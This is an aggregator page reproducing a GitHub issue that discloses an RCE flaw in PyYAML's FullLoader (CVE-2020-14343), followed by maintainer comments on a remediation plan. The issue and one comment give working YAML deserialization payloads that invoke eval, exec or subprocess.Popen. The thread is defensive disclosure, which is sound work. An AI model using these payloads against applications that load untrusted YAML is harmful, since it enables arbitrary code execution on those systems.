question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

.load() and FullLoader still vulnerable to fairly trivial RCE

See original GitHub issue

As of 5.3.1 .load() defaults to using FullLoader and FullLoader is still vulnerable to RCE when run on untrusted input. As demonstrated by the examples below, #386 was not enough to fix this issue.

Some example payloads:

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ "RCE_HERE" ]
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "RCE_HERE"
- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec

I do not believe this is entirely fixable unless PyYAML decides to use secure defaults, and make .load() equivalent to .safe_load() ( #5 )

FullLoader should probably be removed, as I don’t see the purpose of it.

Issue Analytics

  • State:closed
  • Created 3 years ago
  • Reactions:12
  • Comments:44 (30 by maintainers)

github_iconTop GitHub Comments

22reactions
ingydotnetcommented, Sep 22, 2020

https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation has been updated.

Moving forward:

5.4:

  • Address known exploits in FullLoader
  • Default for load remains FullLoader
  • Update wiki page again.

6.0:

  • Default loader for load will be switched to SafeLoader
  • A new wiki page for load usage will be made
  • Error messages from SafeLoader (that were likely caused by the switch) will point to the new wiki page.
  • SafeLoader will be extended to load tuples (and other common data that can be loaded safely).
  • Loaders will be BaseLoader, SafeLoader and PickleLoader
  • UnsafeLoader will be same as PickleLoader but deprecated
  • FullLoader will be same or close to SafeLoader and will be deprecated.

This is the rough plan. I’ll start working on the 5.4 release this week. See https://github.com/yaml/pyyaml/projects/5

Comments welcome.

17reactions
arxenixcommented, Jul 24, 2020

@ingydotnet it’s still possible to get arbitrary code execution with only !!python/object/new , BTW

!!python/object/new:tuple [!!python/object/new:map [!!python/object/new:type [!!python/object/new:subprocess.Popen {}], ['ls']]]

Ultimately, it’s your choice what you decide to do with the library, but let me state my opinions.

I definitely have seen projects in the wild that are loading YAML via yaml.load() from untrusted sources. I can’t disclose specific names but one example is a web portal that allowed users to upload YAML config files, and then loaded them. Given some time, I could probably find several on GitHub if you would like.

Developers tend to be lazy, no one wants to read the docs. This is why it’s important to follow the principle of having secure defaults. It’s important for a library to attempt to protect its users (even if they dont read :p)

Here’s a quote from the ReactJS (popular facebook-made frontend library) documentation which explains their reasoning for their function dangerouslySetInnerHTML. I wholeheartedly agree with them.

Improper use of the innerHTML can open you up to a cross-site scripting (XSS) attack. Sanitizing user input for display is notoriously error-prone, and failure to properly sanitize is one of the leading causes of web vulnerabilities on the internet.

Our design philosophy is that it should be “easy” to make things safe, and developers should explicitly state their intent when performing “unsafe” operations. The prop name dangerouslySetInnerHTML is intentionally chosen to be frightening, and the prop value (an object instead of a string) can be used to indicate sanitized data.

After fully understanding the security ramifications and properly sanitizing the data, create a new object containing only the key __html and your sanitized data as the value.

My observations are that the mental model that many developers have of YAML is that it’s a simple data interchange format exactly like JSON. Not a complex serialization language. In the same way they don’t expect json.load() to lead to code execution, they don’t expect yaml.load() to lead to code execution.

I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML’s ability to serialize complex objects? I don’t have too much insight into this, but my thoughts are – not many.

From some quick Github code search results that I did, there are ~762k files that use PyYAML. Of those, up to 529k files are currently using the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution. 220k call safe_load or specify SafeLoader, and only 13k explicitly use unsafe_load or specify UnsafeLoader.

Read more comments on GitHub >

github_iconTop Results From Across the Web

CVE-2020-14343 | Vulnerability Database - Debricked
A vulnerability was discovered in the PyYAML library in versions before 5.4, wh. ... .load() and FullLoader still vulnerable to fairly trivial RCE...
Read more >
Debian Bug report logs - #966233 pyyaml: CVE-2020-14343
CVE-2020-14343[0 ]: | .load() and FullLoader still vulnerable to fairly trivial RCE The CVE is for an incomplete fix of CVE-2020-1747, ...
Read more >
Bug#966233: pyyaml: CVE-2020-14343
The following vulnerability was published for pyyaml. CVE-2020-14343[0]: | .load() and FullLoader still vulnerable to fairly trivial RCE
Read more >
Bug#966233: marked as done (pyyaml: CVE-2020-14343)
CVE-2020-14343[0 ]: | .load() and FullLoader still vulnerable to fairly trivial RCE The CVE is for an incomplete fix of CVE-2020-1747, see [1]....
Read more >
CVE-2020-14343 - Twitter Search / Twitter
Another exercise: CVE-2020-14343 on a RCE via PyYAML: ... .load() and FullLoader still vulnerable to fairly trivial RCE · Issue #420 · yaml/pyyaml....
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found